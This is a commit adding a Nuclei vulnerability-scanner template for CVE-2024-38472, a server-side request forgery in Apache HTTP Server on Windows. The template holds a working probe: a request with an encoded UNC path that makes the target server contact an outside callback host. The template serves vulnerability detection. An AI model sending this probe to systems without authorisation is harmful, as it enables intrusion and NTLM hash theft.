Merge pull request #10635 from projectdiscovery/Ice3man-3WKjFNFRYCoDhiCYM8DfED

Added template for CVE-2024-38472
2024-09-08 22:59:21 +04:00 · 2024-09-08 22:59:21 +04:00 · 12a1b9eecb
parent 72c7cde473 e49d409237
commit 12a1b9eecb
1 changed files with 39 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-38472.yaml
+++ b/http/cves/2024/CVE-2024-38472.yaml
@ -0,0 +1,39 @@
+id: CVE-2024-38472
+
+info:
+  name: Apache HTTPd Windows UNC - Server-Side Request Forgery
+  author: pdteam
+  severity: high
+  description: |
+    SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.60 which fixes this issue.  Note- Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.
+  reference:
+    - https://blog.orange.tw/2024/08/confusion-attacks-en.html
+    - https://httpd.apache.org/security/vulnerabilities_24.html
+    - https://security.netapp.com/advisory/ntap-20240712-0001/
+    - https://github.com/nomi-sec/PoC-in-GitHub
+    - https://github.com/Abdurahmon3236/CVE-2024-38472
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-38472
+    cwe-id: CWE-918
+    epss-score: 0.00043
+    epss-percentile: 0.09568
+  tags: cve,cve2024,apache,ssrf,oast,httpd
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "/apachehttpd"